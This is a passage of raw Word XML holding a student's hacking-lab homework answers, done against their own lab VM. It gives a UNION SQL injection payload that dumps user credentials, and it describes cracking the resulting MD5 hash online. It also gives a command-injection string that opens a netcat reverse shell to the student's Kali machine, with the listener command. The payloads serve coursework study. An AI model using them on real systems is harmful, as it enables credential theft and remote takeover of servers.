          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> convert the hash to its plaintext form. Explain the process of exploiting the vulnerability, identify the type of hash obtained, and describe the method used to convert the hash to plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432BE9F" w14:textId="5D78514C" w:rsidR="007540DB" w:rsidRDefault="001E336F" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>As mentioned in Step 11 of “</w:t>
      </w:r>
      <w:r w:rsidRPr="001E336F">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>SQL Injection [Low]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>” in workshop</w:t>
      </w:r>
      <w:r w:rsidR="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>8, simply post the request “</w:t>
      </w:r>
      <w:r w:rsidR="00922BAB" w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">5' union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00922BAB" w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00922BAB" w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>(user,"|",first_name,"|",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00922BAB" w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00922BAB" w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>), password from users #</w:t>
      </w:r>
      <w:r w:rsidR="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">” in the submit field like: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347AD5B7" w14:textId="5F0FE03F" w:rsidR="00922BAB" w:rsidRDefault="00922BAB" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922BAB">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1AC34C" wp14:editId="7D8094FE">
            <wp:extent cx="4935003" cy="3396437"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="40292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24930" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5049477" cy="3475222"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A552E2B" w14:textId="40D900B6" w:rsidR="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> injection query means: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C181F88" w14:textId="241164CF" w:rsidR="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>5'</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ends the original SQL query and prepares the statement for an injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94AD9E" w14:textId="5593F4DA" w:rsidR="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Combines the results of the original query with the injected one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD6793E" w14:textId="5FFD1ED5" w:rsidR="00DB72A2" w:rsidRPr="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>(user,"|",first_name,"|",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>), password from users</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Constructs a new query to fetch user details and passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F60968" w14:textId="77777777" w:rsidR="00DB72A2" w:rsidRPr="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>(user,"|",first_name,"|",</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> combines the user's username, first name, and last name into a single string, separated by |.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D39201" w14:textId="77777777" w:rsidR="00DB72A2" w:rsidRPr="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> selects the password field </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve">from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E443FC5" w14:textId="0D950530" w:rsidR="00DB72A2" w:rsidRDefault="00DB72A2" w:rsidP="00DB72A2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72A2">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Comments out the remainder of the original SQL query to ensure only the injected part runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE136AF" w14:textId="47F8C79C" w:rsidR="005E6020" w:rsidRDefault="00D02DF1" w:rsidP="00D02DF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>Using the website “</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Lato" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Lato"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://md5hashing.net/hash</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>” provided in the workshop to r</w:t>
      </w:r>
      <w:r w:rsidRPr="00D02DF1">
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t>eversed hash value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="102535"/>
        </w:rPr>
        <w:t xml:space="preserve"> and got the answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE311E" w14:textId="0A834429" w:rsidR="00D02DF1" w:rsidRPr="00825934" w:rsidRDefault="00D02DF1" w:rsidP="00D02DF1">
      <w:r w:rsidRPr="00D02DF1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68DA8866" wp14:editId="6D4E8AB2">
            <wp:extent cx="5731510" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="184955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52215" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1242060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E185D" w14:textId="77777777" w:rsidR="00CA743A" w:rsidRDefault="00CA743A" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15CFB6A4" w14:textId="2D78E035" w:rsidR="00825934" w:rsidRPr="00825934" w:rsidRDefault="00825934" w:rsidP="00825934">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:rPr>
          <w:rFonts w:ascii="Lato" w:hAnsi="Lato"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. (2 point) Go to http://&lt;Your Hacklab VM IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK2"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>&gt;:8083/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>doa.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00825934">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>to get the secret *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806536E" w14:textId="54D74F23" w:rsidR="00825934" w:rsidRDefault="006D7AB8">
      <w:r>
        <w:t>Type the injection code: “</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7AB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>; netcat 192.168.66.4 1234 -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D7AB8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” in the input box, “;” means end the previous command and execute the command after it, then execute the “netcat” command to create a reversed shell to the ip address “192.168.66.4:1234” which is my kali Linux’s address, finally using the parameter “-e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” to execute shell after successfully connect to the kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26599918" w14:textId="5AD7B76A" w:rsidR="006D7AB8" w:rsidRDefault="006D7AB8">
      <w:r>
        <w:t xml:space="preserve">At the same time, kali is listening </w:t>
      </w:r>
      <w:r w:rsidR="0078572C">
        <w:t>on the port 1234 by executing the command “</w:t>
      </w:r>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1234</w:t>
      </w:r>
      <w:r w:rsidR="0078572C">
        <w:t xml:space="preserve">” which means </w:t>
      </w:r>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="0078572C">
        <w:t xml:space="preserve">isten in </w:t>
      </w:r>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:t>erbose</w:t>
      </w:r>
      <w:r w:rsidR="0078572C">
        <w:t xml:space="preserve"> mode throw the </w:t>
      </w:r>
      <w:r w:rsidR="0078572C" w:rsidRPr="0078572C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="0078572C">
        <w:t>ort 1234, then I got the following result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA9B1B" w14:textId="2C585903" w:rsidR="0078572C" w:rsidRDefault="008F7FED">
      <w:r w:rsidRPr="008F7FED">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="545BA227" wp14:editId="7F2F8525">
            <wp:extent cx="3786259" cy="2696860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174572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22105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3829432" cy="2727611"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007857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B2383"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2D0A3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8944F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5F2C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7443149">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1440447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934"/>
    <w:rsid w:val="00016593"/>
    <w:rsid w:val="00051D67"/>
    <w:rsid w:val="000B5380"/>
    <w:rsid w:val="000C0A34"/>
    <w:rsid w:val="00140708"/>
    <w:rsid w:val="001E336F"/>
    <w:rsid w:val="001E771D"/>
    <w:rsid w:val="001F0271"/>
    <w:rsid w:val="00250E48"/>
    <w:rsid w:val="002D4B81"/>
    <w:rsid w:val="002E19D1"/>
    <w:rsid w:val="003234F5"/>
    <w:rsid w:val="00527262"/>
    <w:rsid w:val="00545591"/>
    <w:rsid w:val="005E6020"/>
    <w:rsid w:val="00634B0E"/>
    <w:rsid w:val="00657C59"/>
    <w:rsid w:val="006D3836"/>
    <w:rsid w:val="006D5359"/>
    <w:rsid w:val="006D7AB8"/>
    <w:rsid w:val="007540DB"/>
    <w:rsid w:val="00770067"/>
    <w:rsid w:val="0078572C"/>
    <w:rsid w:val="007B7B76"/>
    <w:rsid w:val="007D54BB"/>
    <w:rsid w:val="00825934"/>
    <w:rsid w:val="00834899"/>
    <w:rsid w:val="008774F6"/>
    <w:rsid w:val="008936A5"/>
    <w:rsid w:val="008F7FED"/>
    <w:rsid w:val="00921068"/>
    <w:rsid w:val="00922BAB"/>
    <w:rsid w:val="00934DDE"/>
    <w:rsid w:val="00961640"/>
    <w:rsid w:val="009E6100"/>
    <w:rsid w:val="00A631BF"/>
    <w:rsid w:val="00AD1852"/>
    <w:rsid w:val="00B03669"/>
    <w:rsid w:val="00B547FA"/>
    <w:rsid w:val="00B7288B"/>
    <w:rsid w:val="00BC53E3"/>
    <w:rsid w:val="00CA743A"/>
    <w:rsid w:val="00D02DF1"/>
    <w:rsid w:val="00D720DA"/>
    <w:rsid w:val="00D87536"/>
    <w:rsid w:val="00DA58A4"/>
    <w:rsid w:val="00DB72A2"/>
    <w:rsid w:val="00E11EBC"/>
    <w:rsid w:val="00ED480E"/>
    <w:rsid w:val="00FB3FF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351C96A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5417DF3B-A7A4-014C-9912-A3368183F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DF1"/>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25934"/>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825934"/>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825934"/>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825934"/>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825934"/>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825934"/>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825934"/>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825934"/>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825934"/>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59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59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59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259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59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59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59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59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5934"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>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8259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5934"/>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8259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5934"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160" w:line="278" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"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825934"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00825934"/>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825934"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
